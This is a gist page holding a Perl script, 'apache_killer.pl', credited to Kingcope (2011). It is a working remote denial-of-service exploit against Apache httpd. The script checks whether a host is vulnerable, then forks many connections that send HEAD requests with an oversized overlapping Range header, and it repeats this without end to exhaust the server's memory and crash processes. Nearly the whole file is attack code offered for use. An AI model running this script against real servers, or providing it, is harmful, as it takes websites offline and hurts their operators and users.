Skip to content

Instantly share code, notes, and snippets.

@perusio
Created August 20, 2011 16:24

Revisions

  1. @invalid-email-address Anonymous created this gist Aug 20, 2011.
    86 changes: 86 additions & 0 deletions apache_killer.pl
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,86 @@
    #Apache httpd Remote Denial of Service (memory exhaustion)
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #

    use IO::Socket;
    use Parallel::ForkManager;

    sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
    }

    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";

    $pm = new Parallel::ForkManager($numforks);

    $|=1;
    srand(time());
    $p = "";
    for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
    }

    for ($k=0;$k<$numforks;$k++) {
    my $pid = $pm->start and next;

    $x = "";
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
    PeerPort => "80",
    Proto => 'tcp');

    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;

    while (<$sock>) {
    }
    $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }

    sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
    PeerPort => "80",
    Proto => 'tcp');

    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;

    $x = <$sock>;
    if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1;
    } else {
    return 0;
    }
    }

    if ($#ARGV < 0) {
    usage;
    exit;
    }

    if ($#ARGV > 1) {
    $numforks = $ARGV[1];
    } else {
    $numforks = 50;
    }

    $v = testapache();
    if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;
    }
    while (1) {
    killapache();
    }